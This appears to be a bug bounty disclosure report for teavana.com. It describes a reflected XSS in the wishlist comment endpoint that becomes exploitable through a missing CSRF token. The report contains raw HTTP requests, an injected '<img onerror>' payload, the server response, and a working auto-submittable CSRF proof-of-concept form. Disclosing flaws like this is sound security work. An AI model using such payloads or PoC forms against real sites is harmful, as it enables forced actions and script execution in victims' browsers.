Reflected XSS by exploiting CSRF vulnerability on teavana.com wishlist comment module. (wishlist-comments)

User can add comments on their wishlist item. The http request which adds comment on wishlist item, looks like: ```http POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1 Host: www.teavana.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://www.teavana.com/us/en/my-wishlist Content-Length: 55 Cookie: REDACTED Connection: close wishlistComment=:comment_string ``` The value of the `wishlistComment` reflects on the returned HTML snippet as bellow: ```html <textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12"> :comment_string </textarea> ``` But the returned string is not sanitized. As a result if user submits html/javascript payload as the value, that payload will return and will cause javascript execution. **vulnerable post** ```http POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1 Host: www.teavana.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://www.teavana.com/us/en/my-wishlist Content-Length: 55 Cookie: REDACTED Connection: close wishlistComment=</textarea><img+src=x+onerror=alert(1)> ``` **Response** ```html <textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12"> </textarea><img src=x onerror=alert(1)> </textarea> ``` There is no csrf token tied with the comment adding post request. As a result this csrf flaw can make the self-xss as a global reflected xss. **CSRF to XSS PoC** ```html <html> <body> <form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id" method="POST"> <input type="hidden" name="wishlistComment" value="&lt;&#47;textarea&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&gt;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Replace the `:id` with your wishlist id (ex: C1005285074). This will execute the javascript and will popup an alert box. {F129593}